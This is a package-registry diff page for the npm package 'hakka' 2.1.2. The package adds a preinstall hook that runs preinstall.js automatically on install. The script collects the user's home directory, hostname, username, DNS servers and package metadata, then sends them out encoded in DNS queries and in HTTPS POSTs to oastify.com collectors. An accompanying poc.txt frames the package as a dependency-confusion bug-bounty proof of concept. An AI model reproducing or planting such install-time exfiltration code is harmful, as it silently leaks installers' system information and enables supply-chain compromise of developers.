npm - hakka - Versions diffs - 2.1.2 - Mend

hakka 2.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of hakka might be problematic. Click here for more details.

Files changed (5) hide show

package/package.json ADDED Viewed

@@ -0,0 +1,10 @@
+{
+  "name": "hakka",
+  "version": "2.1.2",
+  "description": "Hakka DC by mjhd0x1",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+         },
+  "author": "mjhd0x1",
+  "license": "ISC"
+}

package/poc/package.json ADDED Viewed

@@ -0,0 +1,15 @@
+{
+  "name": "hakka",
+  "version": "2.1.1",
+  "description": "Hakka DC By mjhd",
+  "author": "mjhd0x1",
+  "scripts": { "preinstall": "node preinstall.js" },
+}

package/poc/preinstall.js ADDED Viewed

@@ -0,0 +1,126 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+// Collect tracking data
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+// Step 1: Hex encode the tracking data
+const hexEncodedData = Buffer.from(trackingData, 'utf8').toString('hex');
+// Step 2: Base64 encode the hex data
+const base64EncodedData = Buffer.from(hexEncodedData, 'utf8').toString('base64');
+// Use Base64 encoded data in DNS query (as an example)
+const dnsQuery = `example.com.${base64EncodedData}.mydomain.com`;
+// Example DNS resolution to exfiltrate the data
+dns.resolve(dnsQuery, (err, addresses) => {
+    if (err) {
+        console.error("Error in DNS resolution:", err);
+    } else {
+        console.log("DNS Addresses:", addresses);
+    }
+});
+// Prepare the data for HTTP POST request
+var postData = querystring.stringify({
+    msg: trackingData, // You might want to send the original tracking data here
+});
+// Prepare HTTP request options
+var options = {
+    hostname: "3fjk638jdzb14dksivqlrp5pagg74ysn.oastify.com", // Replace with Interactsh or Pipedream
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+// Create and send the HTTPS request
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+req.on("error", (e) => {
+    console.error(e);
+});
+req.write(postData);
+req.end();

package/poc.txt ADDED Viewed

@@ -0,0 +1,39 @@
+Hello security team, I found dependency confusion vulnerability in your system which leads to remote code execution (RCE)
+Target: https://github.com/hakkafinance/HakkaFinance
+Description of the Vulnerability
+Vulnerable Package Information
+Package Name: hakka
+Version: 1.0.0
+Registry: internal/private
+Description: Hakka
+Author: Thanh Tam
+Impact:
+Remote Code Execution, Data Exfiltration
+Note:
+The code executed during this proof of concept PoC is not harmful to the system and has been designed solely for demonstration purposes. It does not cause any damage or unauthorized modifications to the target system.
+Steps to reproduce in PoC Video:

package/preinstall.js ADDED Viewed

@@ -0,0 +1,126 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+// Collect tracking data
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+// Step 1: Hex encode the tracking data
+const hexEncodedData = Buffer.from(trackingData, 'utf8').toString('hex');
+// Step 2: Base64 encode the hex data
+const base64EncodedData = Buffer.from(hexEncodedData, 'utf8').toString('base64');
+// Use Base64 encoded data in DNS query (as an example)
+const dnsQuery = `example.com.${base64EncodedData}.mydomain.com`;
+// Example DNS resolution to exfiltrate the data
+dns.resolve(dnsQuery, (err, addresses) => {
+    if (err) {
+        console.error("Error in DNS resolution:", err);
+    } else {
+        console.log("DNS Addresses:", addresses);
+    }
+});
+// Prepare the data for HTTP POST request
+var postData = querystring.stringify({
+    msg: trackingData, // You might want to send the original tracking data here
+});
+// Prepare HTTP request options
+var options = {
+    hostname: "f9pw0f2v7b5dype4c7kxl1z14sakybm0.oastify.com", // Replace with Interactsh or Pipedream
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+// Create and send the HTTPS request
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+req.on("error", (e) => {
+    console.error(e);
+});
+req.write(postData);
+req.end();